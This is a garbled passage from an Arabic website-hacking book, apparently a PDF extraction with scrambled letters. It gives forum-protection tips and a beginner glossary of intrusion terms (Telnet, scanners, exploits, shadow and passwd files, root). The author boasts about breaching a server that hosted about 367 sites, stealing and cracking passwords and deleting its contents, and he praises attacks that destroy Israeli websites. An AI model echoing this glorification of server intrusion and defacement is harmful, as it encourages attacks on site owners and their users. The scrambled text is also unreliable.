‫ﻮا ﺧ ﺮهﻛﺎن ﺪاراﻟﻌ ﺮبﻓﻲ ﻣﻠﻔﻪ ﻫﻮﺑﯿﻌ ﺮ ف‬


‫************‬
‫ﺘﺪﯾﺎﺗﻜﻢ‬
‫ﻗﯿﻦﺑﻨﺴﺒﺔ ‪ %٨٠‬ﻻاﺟﻬﺰﺗﻜﻢ وﻣﻨ‬ ‫ﺘﺮ‬
‫‪-٦‬اﻟ ﺤﻤﺎﯾﻪ ﻣﻦاﻟﻤﺨ‬

‫ﺘﻪ‬
‫ﻗﻪ و ﺣﻤﺎﯾ‬
‫ﺘﺮ‬‫ﺘﺪﯾﺎ تاﻟﯿﻜﻢاﻟ ﺤ ﻞ ﺣﻤﺎﯾﺔ‪%٨٠‬اﻟﯿﻜﻢاﺳﺒﺎبا ﺧ‬
‫ﺘ ﺮا قاﻟﻤﻨ‬
‫ﯾﺎ ﷲﻛ ﻞ ﯾﻮم ﻧﺴﻤﻊا ﺧ‬

‫‪ -١‬وﺟﻮدﺛﻐ ﺮا تﺑﻤﺠﻠﺪاﻻدﻣﻦ‬
‫‪-٢‬ﺛﻐ ﺮة ﻣﺠﻠﺪ ﻣﻮد‬
‫ﺘﯿ ﻞ‬
‫‪-٣‬ﺛﻐ ﺮةاﻻﺳ‬
‫ﺘﻤ ﻞ‬‫‪-٤‬اﻟﻬ‬
‫‪-٥‬ﻛﻮﻛﯿﺰ‬
‫ﺘﻠﻨ ﺖ‬
‫‪ -٦‬دﻋﻢاﻟ‬
‫‪ Cfgwiz32.exe -٧‬ﻋﻠﻰاﻟﻤﺠﻠﺪ وﯾﻨﺪوز‪C:\Windows‬‬
‫‪ -٨‬ﻣﻦاﻟﻤﻠ ﻒ‪misc‬‬
‫ﺘ ﺮ قﻟ ﺤﺼﻮ لﺑﻤﻌﻠﻮﻣﺎﺗﻚ‬‫‪ -٩‬وﺟﻮدﺑﺎﺗ ﺶﺑﺠﻬﺎزكﺗﻢارﺳﻠﻪﻟﻚ ﻣﻦﻗﺒ ﻞاﻟﻤﺨ‬
‫***** *********************************************************************************‬
‫‪-٧‬ﻛﯿﻔﯿﺔاﻟ ﺤﻤﺎﯾﺔ‬
‫^^^^^^^^^^‬
‫‪-١‬ﻗﻢﺑ ﺤﻤﺎﯾﺔ ﻣﻠ ﻒاﻻدﻣﻦ ﺟﯿﺪا ‪ .htaccess‬ﺷﻐ ﻞﻓﻘﻂﻓﻲ ﺳ ﺮﻓ ﺮا تاﻟﯿﻨﻮﻛ ﺲﻟﯿ ﺲ ﻮﯾﻨﺪوز‬
‫ﺘﻪ‪.htaccess‬‬ ‫‪-٢‬ﻗﻢﺑ ﺤﻤﺎﯾ‬
‫ﺘﺪي‬ ‫ﺘﯿﻼ تﻛﺜﯿ ﺮ ﯾﺴﺒﺒﺐﺛﻐ ﺮةﺑﺎاﻟﻤﻨ‬ ‫‪ -٣‬ﻻﺗ ﺮﻛﺐ ﺳ‬
‫ﺘﻤ ﻞاﺑﺪا‬‫‪ -٤‬ﻻﺗﻔﻌ ﻞﻟﻐﺔاﻟﻬ‬
‫‪-٥‬ا ﺣﺬر ﻣﻦاﻟﻜﻮﻛﺰ ﻧﻈ ﻒ ﺟﺎﻫﺰك داﺋﻤﺎ‬
‫ﺘﺎﺟﻪ‬‫ﻗﻊ ﻋﻨﺪﻣﺎ ﻻﺗ ﺤ‬‫ﺘ ﻞ ﻧﯿ ﺖﻟﻤﻮ‬‫ﻗﯿ ﻒاﻟ‬ ‫ﺘﻮ‬‫‪-٦‬ﻗﻢﺑ‬
‫‪ -٧‬ﻧﺄﻛﺪ ﻣﻦ ﻋﺪم وﺟﻮد ﻣﻠ ﻒﺑﺎﺳﻢ ‪ Cfgwiz32.exe‬ﻋﻠﻰاﻟﻤﺠﻠﺪ وﯾﻨﺪوز‪C:\Windows‬‬
‫‪ -٨‬دهﺑﻠﻮووووياﻟﺪﻧﯿﺎﻓﯿﻪ ﺟﺎرياﻟﺒ ﺤﺚ ﻋﻦ ﺣ ﻞﻟﻪ‬
‫ﺘ ﺮﻛﯿﺐﺑ ﺮاﻣ ﺞاﻟﻔﯿ ﺮوﺳﺎ تﺑﺠﻬﺎزك …‬ ‫‪-٩‬ﻗﻢﺑ‬

‫‪٨١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﻣﺼﻄﻠﺤﺎت ﻣﻬﻤﺔ ﻟﻠﻤﺒﺘﺪﺋﲔ ﰲ اﺧﱰاق اﳌﻮاﻗﻊ"‬

‫‪$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪ :‬ﻋﻠﻲ زاﺋ ﺮ‬
‫‪$$$$$$$$$$‬‬
‫ﺳﻨﻌ ﺮجﻓﻲ ﻫﺬااﻟﻤﻮ ﺿﻮ ع ﻋﻠﻰ ﻣﺼﻄﻠ ﺤﺎ ت وأﻣﻮر ﻫﺎﻣﺔ ﯾﺠﺐانﺗﻌ ﺮ ف ﻋﻠﯿﻬﺎ ﺳﻮﯾﺎﻗﺒ ﻞاﻟﺒﺪ ء‬
‫=======================================================‬

‫ﺗﻠﻨ ﺖ )‪ -:(Telnet‬و ﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ﺻﻐﯿ ﺮ ﻣﻮﺟﻮدﻓﻲاﻟﻮﯾﻨﺪوز ‪ .‬و ﻫﻮ ﯾﻌﻤ ﻞﻛﻜﻼﯾﻨ ﺖ‬


‫ﺘﻄﺎﻋﺔ ﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞاﻹﺗﺼﺎ لﺑﺎﻟﺴﯿ ﺮﻓ ﺮ‬ ‫ﺘﻪﺗﻜﻮن داﺋﻤﺎﻛﺰﺑﻮن ‪.‬أيأنﺑﺎﺳ‬ ‫أو و ﺿﻌﯿ‬
‫ﺘﺨﺪﻣﻪاﻟﻬﻜ ﺮزدﻏﺎﻟﺒﺎﻟ ﻺﺗﺼﺎ لﺑﺎﻟﺴﯿ ﺮﻓ ﺮ‬ ‫ﺘﻬﺎ ‪ .‬ﯾﺴ‬‫ﺘﻮاﻫﺎ و ﺣﺎﻟ‬ ‫أواﻟﺨﺎدم واﺟ ﺮا ءﺑﻌ ﺾاﻟﻌﻤﻠﯿﺎ تﻛ ﻞ ﺣﺴﺐ ﻣﺴ‬
‫ﻗﻊﺑﻄ ﺮﯾﻘﺔ ﺧﻔﯿﺔ‬ ‫ﻋﺒ ﺮﺑﻮر ت ﻣﻌﯿﻦ و ﺧﺼﻮ ﺻﺎﺑﻮر تاﻹ فﺗﻲﺑﻲ )‪(٢١‬ﻟﻠﺪ ﺧﻮ لاﻟﻰاﻟﻤﻮ‬
‫ﻗﻊ و ﺳ ﺤﺐ ﻣﻠ ﻒاﻟﺒﺎﺳﻮرداو ﻏﯿ ﺮه ﻣﻦاﻟﺒﯿﺎﻧﺎ ت‪.‬‬ ‫‪Anonymous Mode‬ﻟﻌ ﺮ ض ﻣﻠﻔﺎ تاﻟﻤﻮ‬
‫ﺘﻠﻨ ﺖ‪.‬‬‫ﺘﻈﻬ ﺮ ﺷﺎﺷﺔاﻟ‬ ‫ﺘﺨﺪاماﻟﺒ ﺮﻧﺎﻣ ﺞ ‪،‬اذﻫﺐاﻟﻰ ‪ Start ==> Run ==> telnet‬و ﺳ‬ ‫ﻻﺳ‬
‫‪------------------------------------------------------------------------‬‬
‫ﻗﻊ وﻛﺸ ﻒ‬ ‫ﺑ ﺮاﻣ ﺞاﻟﺴﻜﺎنأو ‪ -:Scanner‬و ﻫﻲﺑ ﺮاﻣ ﺞ ﻣﻮﺟﻮدةﻟﻠﻤﺴﺢ ﻋﻠﻰاﻟﻤﻮا‬
‫ﺛﻐ ﺮاﺗﻬﺎإن وﺟﺪ ت ‪،‬ﻓﻬﻲ ﺳ ﺮﯾﻌﺔ‪،‬ﻛﻤﺎأﻧﻬﺎﺗﻤﻠﻚﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت واﺳﻌﺔ وﻛﺒﯿ ﺮة‬
‫ﻗﻊ‬ ‫ﺘﻢﺗﻄﺒﯿﻘﻬﺎ ﻋﻠﻰاﻟﻤﻮ‬ ‫ﺘﻲ ﯾ‬‫ﺘﻮي ﻋﻠﻰاﻟﺜﻐ ﺮا تأواﻻﻛﺴﺒﻠﻮﯾ ﺖ )‪(Exploits‬اﻟ‬ ‫ﺗﺤ‬
‫ﻟ ﺮؤﯾﺔﻓﯿﻤﺎاذاﻛﺎناﻟﺴﯿ ﺮﻓ ﺮ ﯾﻌﺎﻧﻲ ﻣﻦا ﺣﺪىﻫﺬهاﻟﺜﻐ ﺮا تأم ﻻ ‪ .‬و ﻣﻦأﻣﺜﻠﺔ‬
‫ﻫﺬهاﻟﺒ ﺮاﻣ ﺞ‪،‬ﺑ ﺮﻧﺎﻣ ﺞ ‪ Shadow Security Scanner‬و ‪ Stealth‬و وﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻌ ﺮﺑﻲ ﻣﻦ‬
‫ﺑ ﺮﻣﺠﺔاﻷ خ ﻋﻤ ﺮان ‪ Omran Fast‬اﻟ ﺦ ‪.‬‬
‫ﺘﻲﺗﻘﻮمﺑﻌﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰ ﻧﻈﺎمأو ﺳﯿ ﺮﻓ ﺮ‬ ‫ﺘﻠﻔﺔ ‪ ،‬ﻣﻨﻬﺎاﻟ‬ ‫وﻟﻬﺬهاﻟﺒ ﺮاﻣ ﺞأﻧﻮا ع ﻣﺨ‬
‫ـ ‪ IIS‬و ﻣﻨﻬﺎﺑ ﺮاﻣ ﺞاﻟﻤﺴﺢ‬ ‫ﺘﺼﺔﺑﺎﻟﺴﻜﺎن ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا تاﻟ‬ ‫ﻣﻌﯿﻦ ﻣﺜ ﻞاﻟﺒ ﺮاﻣ ﺞاﻟﻤﺨ‬
‫ﻋﻠﻰﺛﻐ ﺮا تاﻟﺴﻲ ﺟﻲايﻓﻘﻂ ‪ CGI‬و ﻣﺎاﻟﻰ ذﻟﻚ ‪.‬‬
‫‪-----------------------------------------------------------------------‬‬
‫ﺘﺼﻔﺢ ‪ .‬وﻟﻬﺎ ﻋﻨﻮان‪، URL‬ﺗﻘﻮم ﻫﺬه‬ ‫اﻛﺴﺒﻠﻮﯾ ﺖ )‪-:(Exploits‬ﻫﻲﺑ ﺮاﻣ ﺞﺗﻨﻔﯿﺬﯾﺔﺗﻨﻔﺬ ﻣﻦ ﺧﻼ لاﻟﻤ‬
‫ﺘﺠﻮ لﻓﯿﻪ ‪،‬ﻛﻤﺎﺗﻮﺟﺪ‬ ‫ﻗﻊ وﺗﻘﻮمﺑﻌ ﻀﻬﺎﺑﺎﻟﺪ ﺧﻮ لاﻟﻰاﻟﺴﯿ ﺮﻓ ﺮ واﻟ‬ ‫ﺘﺎ تﺑﻌ ﺮ ض ﻣﻠﻔﺎ تاﻟﻤﻮ‬ ‫اﻹﻛﺴﺒﻠﻮﯾ‬
‫ـ ‪Buffer‬‬ ‫ﺘﺎ تﺗﻘﻮمﺑﺸﻦ ﻫﺠﻮم ﻋﻠﻰﺑﻮر ت ﻣﻌﯿﻦﻓﻲاﻟﺴﯿ ﺮﻓ ﺮﻟﻌﻤ ﻞﻛ ﺮا شﻟﻪ ‪ ،‬وﻫﺬا ﻣﺎ ﯾﺴﻤﻰﺑ‬ ‫اﻛﺴﺒﻠﻮﯾ‬
‫‪. Over Flow Exploits‬‬
‫ﻫﻨﺎكأﻧﻮا ع ﻣﻦاﻹﻛﺴﺒﻠﻮﯾ ﺖ ‪،‬ﻓﻤﻨﻬﺎا ل ‪CGI Exploits‬أوا ل ‪ CGI Bugs‬و ﻣﻨﻬﺎا ل ‪Unicodes‬‬
‫‪ Exploits‬و ﻣﻨﻬﺎا ل ‪ ، Buffer Over Flow Exploits ،‬و ﻣﻨﻬﺎا ل ‪، PHP Exploits‬و ﻣﻨﻬﺎ‬
‫ﺘﻲﺗﻘﻮمﺑﻌﻤﻠﯿﺔ ﺣﺠﺐاﻟﺨﺪﻣﺔﻟﻠﺴﯿ ﺮﻓ ﺮإن وﺟﺪﻓﯿﻬﺎاﻟﺜﻐ ﺮةاﻟﻤﻄﻠﻮﺑﺔﻟﻬﺬااﻟﻬﺠﻮم‬ ‫ا ل‪ DOS Exploits‬واﻟ‬
‫ﺘﻮﺑﺔﺑﻠﻐﺔاﻟﺴﻲ و‬ ‫ﺘﺎ تاﻟﻤﻜ‬ ‫وانﻟﻢ ﯾﻜﻦ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮأيﻓﺎﯾ ﺮوو ل ‪ . Fire Wall‬و ﻫﻨﺎكﺑﻌ ﺾاﻹﻛﺴﺒﻠﻮﯾ‬
‫ﺘﺪادﻫﺎ )‪. (c.‬‬‫ﯾﻜﻮن اﻣ‬
‫ﺘﻬﺎ وﺗ ﺤﻮﯾﻠﻬﺎاﻟﻰاﻛﺴﺒﻠﻮﯾ ﺖ‬ ‫ﺘ ﺮﺟﻤ‬ ‫ﺘﺎجاﻟﻰﻛﻮﻣﺒﺎﯾﻠ ﺮ ‪Compiler‬اوﺑ ﺮﻧﺎﻣﺠﺎﻟ‬ ‫ﺘﺎ تﺑﺎﻟﺬا تﺗ ﺤ‬‫ﻫﺬهاﻹﻛﺴﺒﻠﻮﯾ‬
‫ﺘﻮب ﺑﻠﻐﺔاﻟﺴﻲ ﻫﺬهاﻟﻰﺑ ﺮﻧﺎﻣﺠﺎ‬ ‫ﺘ ﺤﻮﯾ ﻞاﻹﻛﺴﺒﻠﻮﯾ ﺖاﻟﻤﻜ‬ ‫ﺘﺼﻔﺢ ‪ ،‬وﻟ‬ ‫ﺘﺨﺪم ﻣﻦ ﺧﻼ لاﻟﻤ‬ ‫ﺗﻨﻔﯿﺬي ﻋﺎدي ﯾﺴ‬
‫ﺘﺎجإﻣﺎاﻟﻰ‬ ‫ﺗﻨﻔﯿﺬﯾﺎ ‪ ،‬ﻧ ﺤ‬
‫ﺘﺸﻐﯿ ﻞ وﯾﻨﺪوز ‪.‬أﺷﻬ ﺮ ﻫﺬه‬ ‫ﺘﺸﻐﯿ ﻞﻟﯿﻨﻮﻛ ﺲاو ﯾﻮﻧﻜ ﺲ ‪،‬اواﻟﻰايﻛﻮﻣﺒﺎﯾﻠ ﺮ ﯾﻌﻤ ﻞ ﺿﻤﻦ ﻧﻈﺎماﻟ‬ ‫ﻧﻈﺎماﻟ‬
‫ﺘ ﺮﺟﻤﺎ تأواﻟﻤ ﺤﻮﻻ ت (ﺑ ﺮﻧﺎﻣ ﺞاﺳﻤﻪ ‪ Borland C++ Compiler‬وﻫﻲﺗﻌﻤ ﻞﺗ ﺤ ﺖ‬ ‫اﻟﻜﻮﻣﺒﺎﯾﻠ ﺮس )اﻟﻤ‬
‫ﺘﺸﻐﯿ ﻞ وﯾﻨﺪوزﻛﻤﺎ ذﻛ ﺮﻧﺎ ﺳﺎﺑﻘﺎ‪.‬‬ ‫ﻧﻈﺎماﻟ‬
‫‪----------------------------------------------------------------------‬‬

‫‪٨٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻬﺎ ﻣﻦاﻟﻮﻟﻮجاﻟﻐﯿ ﺮ ﺷ ﺮﻋﻲﻟﻨﻈﺎم‬ ‫ﺘﻌﻤﻠﻬﺎاﻟﺴﯿ ﺮﻓ ﺮا تﻟ ﺤﻤﺎﯾ‬ ‫ﺎﻟﺠﺪاراﻟﻨﺎري ‪-:FireWall‬ﻫﻲﺑ ﺮاﻣ ﺞﺗﺴ‬


‫ﺘﺨﺪﻣﺔ‬ ‫ﺘﻄﻔﻠﯿﻦ ‪.‬ﻫﻲﺗﻤﺜ ﻞاﻟ ﺤﻤﺎﯾﺔﻟﻠﺴﯿ ﺮﻓ ﺮ ﻃﺒﻌﺎ ‪ ،‬وﻟﻜﻨﻲأﻧﻮهﺑﺄناﻟﻔﺎﯾ ﺮووﻻ تاﻟﻤﺴ‬ ‫ﻣﻠﻔﺎﺗﻬﺎ ﻣﻦﻗﺒ ﻞاﻟﻤ‬
‫ﺘﺨﺪمﻟ ﺤﻤﺎﯾﺔاﻷﺟﻬﺰة ‪.‬‬ ‫ﺘﻲﺗﺴ‬ ‫ﺘﻠ ﻒ ﻋﻦﺗﻠﻚاﻟ‬ ‫ﻗﻊ (ﺗﺨ‬ ‫ﻟ ﺤﻤﺎﯾﺔاﻟﺴﯿ ﺮﻓ ﺮا ت )اﻟﻤﻮا‬
‫‪----------------------------------------------------------------------‬‬
‫‪-:Token‬ﻫﻮ ﻣﻠ ﻒاﻟﺒﺎﺳﻮرداﻟﻤﻈﻠ ﻞ )‪ (Shadowed Passwd‬واﻟﺬي ﯾﻜﻮنﻓﯿﻪاﻟﺒﺎﺳﻮرد‬
‫ﻋﻠﻰ ﺷﻜ ﻞ *أو ‪x‬أي ‪. Shadowed‬إن وﺟﺪ ت ﻣﻠ ﻒاﻟﺒﺎﺳﻮرد ﻣﻈﻠﻼ ‪،‬ﻓﯿﺠﺐ ﻋﻠﯿﻚ ﺣﯿﻨﻬﺎاﻟﺒ ﺤﺚ ﻋﻦ‬
‫ﻣﻠ ﻒاﻟﺒﺎﺳﻮرداﻟﻐﯿ ﺮاﻟﻤﻈﻠ ﻞ واﻟﺬي ﯾﺴﻤﻰ ‪. Shadow file‬ﺗﺠﺪهﻓﻲ ‪. etc/shadow/‬‬
‫‪----------------------------------------------------------------------‬‬
‫ﻗﻪ‪.‬ﻫﻨﺎك‬ ‫ﺘ ﺮا‬
‫ﻗﻊاﻟﻤ ﺮاد ا ﺧ‬ ‫ﺘﻲﺗﺪ ﺧ ﻞﻓﯿﻬﺎاﻟﻰاﻟﻤﻮ‬ ‫‪-:Anonymouse‬ﻫﻲاﻟﻮ ﺿﻌﯿﺔاﻟﺨﻔﯿﺔ واﻟﻤﺠﻬﻮﻟﺔاﻟ‬
‫ﺘﻌﻤﻠﻬﺎﻓﻲاﻟﺪ ﺧﻮ لاﻟﻤﺠﻬﻮ لاﻟﻰاﻟﺴﯿ ﺮﻓ ﺮ و‬ ‫ﺘﻄﯿﻊانﺗﺴ‬ ‫ﺧﺎ ﺻﯿﺔﻓﻲﺑ ﺮاﻣ ﺞاﻻ فﺗﻲﺑﻲﺑﻨﻔ ﺲاﻹﺳﻢ ‪،‬ﺗﺴ‬
‫ﺳ ﺤﺐاﻟﻤﻠﻔﺎ ت ﻣﻨﻪ وﻫﺬهأ ﺻﺒ ﺤ ﺖ ﻧﺎدرة ﻧﻮﻋﺎ ﻣﺎاﻵن ‪.‬‬
‫‪----------------------------------------------------------------------‬‬
‫ﺘﻲ ﯾﻌﺎﻧﻲ ﻣﻨﻬﺎ‬ ‫‪-:Valnerableties‬أياﻟﺜﻐ ﺮا تأو ﻣﻮا ﺿﻊاﻟ ﻀﻌ ﻒاﻟﻐﯿ ﺮ ﻣ ﺤﺼﻨﺔأواﻟﻘﺎﺑﻠﺔﻟﻠﻌﻄﺐ واﻟ‬
‫ﺘﻐﻼﻟﻬﺎ ﻣﻦﻗﺒ ﻞاﻟﻬﺎﻛ ﺮزﻓﻲ ﻣﻬﺎﺟﻤﺔاﻟﺴﯿ ﺮﻓ ﺮ و‬ ‫ﺘﻲﻗﺪﺗﺸﻜ ﻞ ﺧﻄ ﺮاأﻣﻨﯿﺎ ﻋﻠﯿﻪ ﻣﻤﺎ ﯾﺆدياﻟﻰاﺳ‬ ‫اﻟﺴﯿ ﺮﻓ ﺮ واﻟ‬
‫ﻗﻪأوﺗﺪﻣﯿ ﺮه ‪.‬‬ ‫ﺘ ﺮا‬‫اﺧ‬
‫ﻣﺎﻫﻲ ﻣﻔ ﺮدﻫﺎ ؟ ‪Valnerable ، (:‬أيﺛﻐ ﺮةأوﺑﺎﻷ ﺻﺢ ﻣﻮ ﺿﻊاﻟ ﻀﻌ ﻒ واﻟﻤﻜﺎناﻟﻐﯿ ﺮ ﻣﺆﻣﻦﺑﺸﻜ ﻞ ﺳﻠﯿﻢ‬
‫ﺘﻲ وأﻣﻦاﻟﺸﺒﻜﺎ ت و ﻏﯿ ﺮﻫﺎﻛﺎﻟﻘﺎﺋﻤﺔ‬ ‫ﺘﻤﺔﺑﺎﻟﺴﯿﻜﯿﻮرﯾ‬ ‫ﻗﻊاﻟﻤﻬ‬ ‫‪ .‬وﺗﻜﺜ ﺮ ﻫﺬهاﻟﻜﻠﻤﺔﻓﻲاﻟﻘﻮاﺋﻢاﻟﺒ ﺮﯾﺪﯾﺔﻟﻠﻤﻮا‬
‫ﻗﻊ ‪Security Focus‬أوﺑﺎ قﺗ ﺮاكاو ﻏﯿ ﺮﻫﺎ ‪.‬‬ ‫اﻟﺒ ﺮﯾﺪﯾﺔاﻟﻤﻮﺟﻮدةﻓﻲ ﻣﻮ‬
‫‪----------------------------------------------------------------------‬‬
‫ﺘﻮي ﻋﻠﻰﺑﺎﺳﻮرداﻟ ﺮو ت وﺑﺎﺳﻮردا تاﻷﺷﺨﺎ صاﻟﻤﺼ ﺮ حﻟﻬﻢ‬ ‫‪: passwd file‬ﻫﻮاﻟﻤﻠ ﻒاﻟﺬي ﯾ ﺤ‬
‫ﻗﻊ ﻣﻮﺟﻮدﻓﻲ ﻧﻔ ﺲاﻟﻤﻠ ﻒ ﻃﺒﻌﺎ وﻏﺎﻟﺒﺎ ﻣﺎ ﯾﻜﻮن ﻣﺸﻔ ﺮ وﺑﻤﻘﯿﺎس ‪DES‬‬ ‫ﺑﺎﻟﺪ ﺧﻮ لاﻟﻰاﻟﺴﯿ ﺮﻓ ﺮ ‪.‬ﺑﺎﺳﻮرداﻟﻤﻮ‬
‫‪.‬‬
‫‪----------------------------------------------------------------------‬‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊ ﻣﻠﻔﺎ ت‬ ‫ﺘﺨﺪماﻟﺠﺬري واﻟ ﺮﺋﯿﺴﻲﻟﻠﻨﻈﺎم ‪،‬ﻟﻪﻛ ﻞاﻟﺼﻼ ﺣﯿﺎ تﻓﻲاﻟ‬ ‫ـ ‪ : root‬وﻫﻮاﻟﻤﺴ‬ ‫اﻟﺠﺬرأواﻟ‬
‫ﻗﻊ واﻟﺴﯿ ﺮﻓ ﺮ ﻣﻦإزاﻟﺔأوا ﺿﺎﻓﺔأوﺗﻌﺪﯾ ﻞﻟﻠﻤﻠﻔﺎ ت‪.‬‬ ‫اﻟﻤﻮ‬
‫ﺘﺸﻐﯿ ﻞﻟﯿﻨﻮﻛ ﺲ‬ ‫ﺘﻲﺗﻌﻤ ﻞ ﺿﻤﻦ ﻧﻈﺎماﻟ‬ ‫ﻗﻊاﻟ‬ ‫ﻗﻊ ﻧﻔﺴﻪﻓﻲاﻟﻤﻮا‬ ‫ﻏﺎﻟﺒﺎ ﻣﺎ ﯾﻜﻮنﺑﺎﺳﻮرداﻟ ﺮو تﻫﻮﺑﺎﺳﻮرداﻟﻤﻮ‬
‫او ﯾﻮﻧﻜ ﺲأو ﺳﻮﻻريأو ‪ Free BSD‬و ﻏﯿ ﺮﻫﺎ ‪.‬‬
‫‪----------------------------------------------------------------------‬‬
‫ﻗﻊﺗﻮ ﺿﻊﻓﯿﻪﻓﻬﻮ ﺟﻬﺎزﻛﻤﺒﯿﻮﺗ ﺮ‬ ‫ﻗﻊ ‪،‬اذأنﻛ ﻞ ﻣﻠﻔﺎ تاﻟﻤﻮ‬ ‫ﺘ ﻀﯿ ﻒﻟﻠﻤﻮ‬ ‫اﻟﺴﯿ ﺮﻓ ﺮ ‪: Server‬ﻫﻮاﻟﺠﻬﺎزاﻟﻤﺴ‬
‫ﻋﺎديﻛﻐﯿ ﺮه ﻣﻦاﻷﺟﻬﺰةﻟﻜﻨﻪ ذواﻣﻜﺎﻧﯿﺎ ت ﻋﺎﻟﯿﺔﻛﻜﺒ ﺮ ﺣﺠﻢاﻟﻘ ﺮ صاﻟﺼﻠﺐ واﻟ ﺮام واﻟﻜﺎ ش ﻣﯿﻤﻮري و‬
‫ﻗﻊ ﺷﻐﺎﻟﺔ ‪ ٢٤‬ﺳﺎﻋﺔ ﻋﻠﻰ‬ ‫ﺘ ﺮﻧ ﺖ ‪ ٢٤‬ﺳﺎﻋﺔ ‪ ،‬و ﻫﺬا ﻫﻮ ﺳﺒﺐﻛﻮناﻟﻤﻮا‬ ‫ﺘﺼ ﻞﺑﺎﻹﻧ‬ ‫ﺘﻪاﻟﻬﺎﺋﻠﺔ ‪ ،‬و ﻫﻮ ﻣ‬ ‫ﺳ ﺮﻋ‬
‫ﺘﻤﺪ ﻣﻦ ﺳﯿ ﺮﻓ ﺮ ﻵ ﺧ ﺮ و ﻣﻦ ﺷ ﺮﻛﺔﻷ ﺧ ﺮى‪.‬‬ ‫ﻗﻊ وا ﺣﺪ‪ ،‬وﻫﺬا ﯾﻌ‬ ‫ﺘ ﻀﯿ ﻒاﻟﺴﯿ ﺮﻓ ﺮأﻛﺜ ﺮ ﻣﻦ ﻣﻮ‬ ‫ﺘ ﺮﻧ ﺖ ‪. (:‬ﻗﺪ ﯾﺴ‬ ‫اﻹﻧ‬
‫ﺘ ﺮا ق ﺟﻤﯿﻊ‬ ‫ﻗﻊ ‪،‬ﻓﯿﺴﻬ ﻞ ﺣﯿﻨﻬﺎا ﺧ‬ ‫ﺘ ﺮا قاﻟﺴﯿ ﺮﻓ ﺮاﻟﺬي ﯾﻤﻠﻚاﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﻤﻮا‬ ‫ﺿ ﺮﺑﺔاﻟﻬﺎﻛ ﺮز ﻃﺒﻌﺎ ﻫﻲا ﺧ‬
‫ﻗﺔ‬ ‫ﺘﻬﺎأو ﺳ ﺮ‬ ‫ﺘﻪ ﻣﻤﺎ ﯾﺆديإﻣﺎاﻟﻰﺗﺪﻣﯿ ﺮﻫﺎأواﻟﻌﺒﺚﻓﻲ ﻣﻠﻔﺎﺗﻬﺎأوﺗﺸﻮﯾﻪ واﺟﻬ‬ ‫ﺘﻲﺗﻨﺪرجﺗ ﺤ‬ ‫ﻗﻊاﻟ‬ ‫اﻟﻤﻮا‬
‫ﻗﻊاﻹﺳ ﺮاﺋﯿﻠﯿﺔ وﺑﻜﺜ ﺮة و ﷲاﻟ ﺤﻤﺪ ‪- .‬‬ ‫ﺑﯿﺎﻧﺎﺗﻬﺎ وﺗﺪﻣﯿ ﺮﻫﺎأو ﻣﺴ ﺤﻬﺎ ﻣﻦاﻟﻨ ﺖﺗﻤﺎﻣﺎ ‪ ،‬وﻫﺬا ﻣﺎ ﯾ ﺤﺪ ثﻟﻠﻤﻮا‬
‫ﻗﻊ و ﺣﺼﻠ ﺖ‬ ‫ﺘﻮيﻗ ﺮاﺑﺔ ‪ ٣٦٧‬ﻣﻮ‬ ‫ﻗ ﺖ ﺳﯿ ﺮﻓ ﺮ ﯾ ﺤ‬ ‫ﺘﺮ‬‫ﺟﺰاﻛﻢا ﷲ ﺧﯿ ﺮاأﯾﻬﺎاﻟﻤﺠﺎﻫﺪون وأذﻛ ﺮاﻧﻲﻓﻲأ ﺧ ﺮ ﻣ ﺮةا ﺧ‬
‫ﻋﻠﻰ ﺟﻤﯿﻊ ﻣﻠﻔﺎ تاﻟﻜﻮﻧﻔﯿ ﺞاﻟﻤﻮﺟﻮدة دا ﺧ ﻞاﻟﺴﯿ ﺮﻓ ﺮ وﻓﯿﻬﺎ ﻃﺒﻌﺎاﻟﺒﺎﺳﻮردا تﺑﺪون ﺗﺸﻔﯿ ﺮﻛﻤﺎﻧﻌﻠﻢ وﻫﻲ‬
‫ﺘﺢﺗﺸﻔﯿ ﺮاﻟﺒﺎﺳﻮردا ت‬ ‫ﺘﺪﯾﺎ ت واﻟﺒﻘﯿﺔ ﻣﻦ ﺧﻼ لﻓ‬ ‫اﻟﺨﺎﺻﺔﺑﻤﺠﻼ تاﻟﻨﯿﻮك وﻛﺬﻟﻚاﻟﺨﺎ ﺻﺔﺑﺎﻻدﻣﻦﻟﺒ ﺮاﻣ ﺞ اﻟﻤﻨ‬
‫ﻗﻊ ﻣﻦاﻻ فﺗﻲﺑﻲﺑﻼ ﻋﻨﺎ ء و ﺣﺬ فﻛ ﻞ ﻣﺎﻓﯿﻪ ‪. -‬‬ ‫ﺘ ﺮا قاﻟﻤﻮ‬‫ﺘﻄﯿﻊ ﻣﺒﺎﺷ ﺮة ﻣﻦا ﺧ‬ ‫ﺑﺒ ﺮﻧﺎﻣ ﺞ ﺟﻮنﺗﺴ‬
‫‪-----------------------------------------------------------------------‬‬

‫‪٨٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻌﻤ ﻞﻟﺸﻦ ﻫﺠﻮم‬ ‫ﺘﻲﺗﺴ‬ ‫ﺘﺎ تاﻟ‬


‫ﺑﻮﻓ ﺮأوﻓ ﺮﻓﻠﻮ ) ‪ : ( Buffer over Flow‬و ﻫﻲ ﻧﻮ ع ﻣﻦأﻧﻮا عاﻻﻛﺴﺒﻠﻮﯾ‬
